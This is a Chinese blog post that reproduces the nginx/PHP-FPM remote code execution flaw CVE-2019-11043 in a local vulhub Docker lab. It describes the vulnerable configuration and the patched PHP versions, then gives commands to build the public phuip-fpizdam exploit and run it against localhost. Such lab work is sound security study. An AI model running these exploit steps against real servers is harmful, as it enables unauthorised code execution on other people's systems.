CVE-2019-11043漏洞复现

最新推荐文章于 2024-06-25 09:10:20 发布
最新推荐文章于 2024-06-25 09:10:20 发布
阅读量310 收藏 1
点赞数
分类专栏: php nginx CVE 文章标签: nginx php linux docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112547977
版权
CVE 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
php
1 篇文章 0 订阅
订阅专栏
nginx
1 篇文章 0 订阅
订阅专栏

CVE-2019-11043漏洞复现

0x01漏洞简介

nginx + php-fpm 配置不当,当nginx配置文件中有fastcgi_split_path_info,却没有if(!-f $document_root$fastcgi_script_name){return 404;}的时候就会导致远程代码执行。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass   php:9000;
...
}

攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。

影响版本:

  • PHP 7.0 版本
  • PHP 7.1 版本
  • PHP 7.2 版本
  • PHP 7.3 版本

修复建议:

  • PHP 7.1.X更新至7.1.33
  • PHP 7.2.X更新至7.2.24
  • PHP 7.3.X更新至7.3.11

0x02环境搭建

系统:kali

安装 docker、golang 环境

sudo apt-get install docker docker-compose
sudo apt install golang

搭建环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043 && docker-compose up -d

在这里插入图片描述

查看docker环境:

在这里插入图片描述

访问8080端口,成功如下

在这里插入图片描述

0x03漏洞利用

安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build

默认使用的是proxy.golang.org,在国内无法访问,所以换了一个国内能访问的代理地址:https://goproxy.cn

在这里插入图片描述

工具攻击

./phuip-fpizdam http://127.0.0.1:8080/index.php

在这里插入图片描述

成功利用,参数名为a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AAP46kuo-1610457931550)(C:\Users\10068\AppData\Roaming\Typora\typora-user-images\image-20201225021301464.png)]

0x04参考链接:

https://blog.csdn.net/weixin_43606134/article/details/107646467

https://blog.csdn.net/qq_43342566/article/details/102733144

http://blog.leanote.com/post/snowming/9da184ef24bd

https://blog.csdn.net/weixin_40412037/article/details/111225967

Spaceman-911
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-11043 漏洞复现
m0_46580995的博客
07-19 1647
PHP-FPM 远程代码执行漏洞CVE-2019-11043漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 复现环境vnlhub 复现exp需要安装go语言环境 apt-get install golang -y 然后换个源(国内) go en
vulhub靶场php环境下的CVE-2019-11043PHP远程代码执行漏洞
m0_73248913的博客
02-17 268
vulhub靶场php环境下的CVE-2019-11043PHP远程代码执行漏洞
【网络安全】漏洞挖掘之CVE漏洞复现
最新发布
anquan2233的博客
06-25 737
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
CVE-2019-11043PHP远程代码执行漏洞复现
永远是少年
12-11 2165
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043PHP远程代码执行漏洞复现。 一、CVE-2019-11043PHP远程代码执行漏洞)简介 二、CVE-2019-11043PHP远程代码执行漏洞漏洞环境搭建 三、CVE-2019-11043PHP远程代码执行漏洞漏洞利用工具安装 四、CVE-2019-11043PHP远程代码执行漏洞复现
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4738
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Redis 未授权访问 CNNVD-201511-230 漏洞复现
Senimo
05-03 1924
CNNVD-201511-230 Redis 未授权访问漏洞一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接六、利用工具 一、漏洞描述 Redis 是美国 RedisLabs 公司赞助的一套开源的使用 ANSIC 编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的 API。Redis 中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在 6379 端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 5896
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
CVE-2019-11043远程代码执行漏洞复现
qq_42133828的博客
11-02 7163
CVE-2019-11043远程代码执行漏洞复现 漏洞名称: php fastcgi 远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/ 公布时间: 2019-10-28 涉及应用版本: <7.1.33的PHP版本7.1.x ...
PHP远程代码执行漏洞CVE-2019-11043分析
五侠的博客
05-24 770
PHP远程代码执行漏洞CVE-2019-11043分析 CVE-2019-11043是一种2019年出现的PHP远程代码执行漏洞 Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空,最终可导致任意代码执行。 利用条件 PHP版本7及fastcgi协议 PHP7以上,使用fpm形式处理请求,需要使用fastcgi协议,并且利用nginx的正则实现pathinfo和filename分离,例如:inidex.php/artic
log4j漏洞复现
weixin_68647219的博客
04-20 4609
2021年12月8号爆出的log4j2的远程代码执行漏洞cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
渗透测试之路:ThinkPHP漏洞复现
m0_68353775的博客
01-10 2325
其实ThinkPH框架漏洞大多用到的都是设置对于控制器名的一个疏忽问题,不理解的小伙伴可以查来url调用文件的机制来学习一下,其实这些框架漏洞都是基于基础漏洞的一些拓展,至于sql漏洞,了解一下pdo预编译原理即可。不管java或是php在进行数据库查询的时候都应该进行pdo预编译,我们都知道,在jdbc工作的时候分成好多步1.建立连接2.写入sql语句3.预编译sql语句4.设置参数5.执行sql获取结果6.遍历结果(处理结果)7.关闭连接。
PHP远程代码执行漏洞(CVE-2019-11043)复现
m_ing
07-28 1411
漏洞说明# 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发 漏洞编号# CVE-2019-11043 影响范围# 在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远
漏洞利用】CVE-2019-11043 PHP 远程代码执行漏洞
weixin_43486390的博客
02-27 1173
本文借鉴了FLy_鹏程万里大佬的《Kali Linux下go语言环境搭建》 链接:https://blog.csdn.net/Fly_hps/article/details/81073316 整合了一些文章作为自己的笔记,以便后续记忆学习。 0x01 背景 9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且...
CVE-2019-11043复现
hhiollk的博客
03-31 545
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
CVE2019-11043漏洞复现
daqiangdetianxia的博客
10-05 531
知其然,知其所以然。 原理:https://github.com/neex/phuip-fpizdam/blob/master/ZeroNights2019.pdf docker使用别人搭建好的环境 git clone https://github.com/vulhub/vulhub.git //git将vulhub下载到本地 cd vulhub/php/CVE-2019-11043 //进入CVE-2019-11043的目录 docker-compose up -d //下载.
CVE-2017-8464复现
qq_41772873的博客
03-02 1046
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
永恒之蓝漏洞CVE-2017-0144)复现
LRainner的博客
03-04 4599
永恒之蓝漏洞CVE-2017-0144)复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
centos7.6环境编译安装php-7.2.24修复最新 CVE-2019-11043 漏洞
reblue520的专栏
10-29 1469
先编译安装php-7.2.24,然后编译安装扩展 主版本地址地址:https://www.php.net/distributions/php-7.2.24.tar.gz # 编译 php-7.2.24 参数./configure --prefix=/usr/local/php-7.2.24_fpm --with-config-file-path=/usr/local/php-7.2...
php-fpm (CVE-2019-11043)漏洞复现
thelostworld
05-11 273
漏洞详情来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大影响版本当Nginx + php-
CVE-2019-11477 漏洞复现教程
05-27
我很抱歉,由于 CVE-2019-11477 是一种漏洞,攻击该漏洞可能导致远程服务器拒绝服务或崩溃,因此我无法提供该漏洞复现教程或攻击代码。在任何情况下,攻击漏洞是违法行为,违反了信息安全法律法规,也会对网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值